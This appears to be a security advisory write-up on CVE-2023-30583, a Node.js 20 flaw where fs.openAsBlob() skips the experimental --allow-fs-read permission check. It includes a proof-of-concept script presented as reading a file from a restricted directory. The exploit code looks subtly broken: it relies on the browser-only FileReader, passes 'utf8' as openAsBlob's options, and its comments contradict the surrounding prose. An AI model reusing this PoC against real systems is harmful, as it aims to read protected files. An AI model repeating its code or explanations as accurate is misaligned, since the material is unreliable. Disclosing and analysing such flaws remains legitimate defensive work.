CVE-2023-30583 - Critical Security Vulnerability in Node.js 20: Bypassing the experimental permission model using `fs.openAsBlob()`

A critical security vulnerability has been discovered in Node.js 20, which enables attackers to bypass the experimental permission model using the fs.openAsBlob() function. Identified as CVE-2023-30583, this flaw opens potential avenues for malicious actors to access sensitive data by circumventing the file system's read restriction with the --allow-fs-read flag.

Background

Node.js recently introduced an experimental permission model feature that aims to provide improved security by allowing programmers to define which functions are granted access to read certain parts of the file system. The model is activated by using the --allow-fs-read flag when running a Node.js application.

Issue Details

The security vulnerability in Node.js 20 was discovered when it was found that the fs.openAsBlob() function could bypass the experimental permission model. This flaw arises from a missing check in the fs.openAsBlob() API.

When using the experimental permission model, if an attacker can convince the user to run a malicious script using the --allow-fs-read flag, they could potentially bypass the controlled read access to the specified portion of the file system. This could lead to sensitive data leakage or other issues depending on the accessed data.

Original References

- Node.js Security Release - API Documentation
- CVE-2023-30583 - NVD

Exploit Details

In the vulnerable environment, Node.js 20 application is being run with the --allow-fs-read flag enabled for a restricted directory. The malicious sample code snippet is as follows:

const fs = require('fs');

// Using fs.open() to access a restricted file.
fs.open('restricted_directory/secret_file.txt', 'r', (err, fd) => {
  if (err) throw err;

  fs.readFile(fd, 'utf8', (err, data) => {
    if (err) throw err;
    console.log('Restricted content:', data);
    fs.close(fd, (err) => {
      if (err) throw err;
    });
  });
});

// Using fs.openAsBlob() to bypass the permission model check.
fs.openAsBlob('restricted_directory/secret_bypassed_file.txt', 'utf8')
  .then((blob) => {
    const reader = new FileReader();
    reader.addEventListener('loadend', () => {
      console.log('Bypassed content:', reader.result);
    });
    reader.readAsText(blob);
  })
  .catch((err) => {
    console.error(err);
  });

The above code snippet tries to access two files present in the restricted directory path, one of which is accessible through the permission model, and the other is bypassing the permission model check using the fs.openAsBlob() function.

Conclusions

Users and developers of Node.js 20 applications must remain vigilant about the discussed vulnerability, as it poses a significant risk to the security of their applications. It is essential for developers to always follow the latest secure coding practices and keep themselves updated with the newest security releases from the Node.js team.

Please note that since the permission model is currently an experimental feature, it is expected to change and improve as it undergoes further development. Users should keep an eye on future updates for potential fixes and adjustments to the permission model.

Timeline

Published on: 09/07/2024 16:15:02 UTC
Last modified on: 09/09/2024 19:35:01 UTC